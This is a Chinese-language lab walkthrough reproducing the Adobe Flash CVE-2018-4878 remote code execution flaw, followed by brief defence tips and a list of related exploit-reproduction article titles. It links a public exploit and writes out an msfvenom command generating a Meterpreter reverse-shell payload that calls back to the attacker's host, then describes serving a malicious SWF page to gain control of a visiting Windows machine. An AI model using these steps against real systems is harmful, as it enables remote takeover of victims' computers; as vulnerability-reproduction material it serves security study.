Adboe Flash远程代码执行_CVE-2018-4878漏洞复现
Adboe Flash远程代码执行_CVE-2018-4878漏洞复现
一、漏洞描述
该漏洞可针对windows用户发起定向攻击。攻击者可以诱导用户打开包含恶意Flash代码文件的Microsoft Office文档、网页、垃圾电子邮件等。
二、漏洞影响版本
Flash Player版本28.0.0.137以及之前的所有版本
三、漏洞复现环境搭建
攻击机:kali ip:192.168.10.136
靶机:win10 ie默认集成flash,没有升级
四、漏洞复现
1.github下载exp, https://github.com/anbai-inc/CVE-2018-4878
2.修改exp
2.1修改shellcode为自己生成的反弹连接shellcode,首先先生成反弹连接shellcode
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.136 lport=8888 -f python >/root/shellcode.txt
2.2用生成的shellcode替换exp中对应的shellcode
2.3修改exp中生成文件保存的路径
3.运行python脚本,会生成两个文件, exploit.swf和index.html
4.把exploit.swf和index.html复制到/var/www/html,然后开启web服务, 此时,Kali Linux上Web服务启动,并且具备index.html这个页面。只要靶机启用flash并访问了这个页面,则可以直接被控制
5.kali 开启监听
6.靶机访问http://192.168.10.136/index.html
7.此时kali端已经获取到会话
五、漏洞防御
1.下载最新版本的Adobe Flash
2.安装常见杀毒软件,开启实时防护和杀毒引擎实时升级
- WebLogic 任意文件上传远程代码执行_CVE-2018-2894漏洞复现
- Apache struts2 namespace远程命令执行_CVE-2018-11776(S2-057)漏洞复现
- Git漏洞允许任意代码执行(CVE-2018-17456)复现
- windows RDP远程代码执行_CVE-2019-0708漏洞复现
- CVE-2017-8464 LNK文件(快捷方式)远程代码执行漏洞复现
- 【漏洞通告】Weblogic 反序列化远程代码执行高危漏洞 (CVE-2018-2628)
- 【渗透测试】ApacheTomcat 远程代码执行漏洞复现CVE-2017-12615
- CVE-2018-7600-Drupal远程代码执行漏洞-Render API
- CVE-2018-7600 Drupal核心远程代码执行漏洞分析
- iis6.0远程代码执行漏洞复现(CVE-2017-7269)
- WebLogic 反序列化远程代码执行漏洞(CVE-2018-2628)
- IIS 6.0远程代码执行漏洞(CVE-2017-7269)
- [EXP]CVE-2019-1821 Cisco Prime Infrastructure思科未授权远程代码执行漏洞
- WordPress Van Ons WP GDPR Compliance插件任意代码执行漏洞(CVE-2018-19207)
- Node.js 反序列化漏洞远程执行代码(CVE-2017-5941)
- IBM Campaign 任意代码执行安全漏洞(CVE-2018-1115)
- Struts2 REST 插件 XStream 远程代码执行漏洞 S2-052 复现过程
- CVE-2017-8464 远程命令执行漏洞复现
- Office CVE-2017-8570远程代码执行漏洞复现
- Adobe Flash cve-2018-4878 的漏洞复现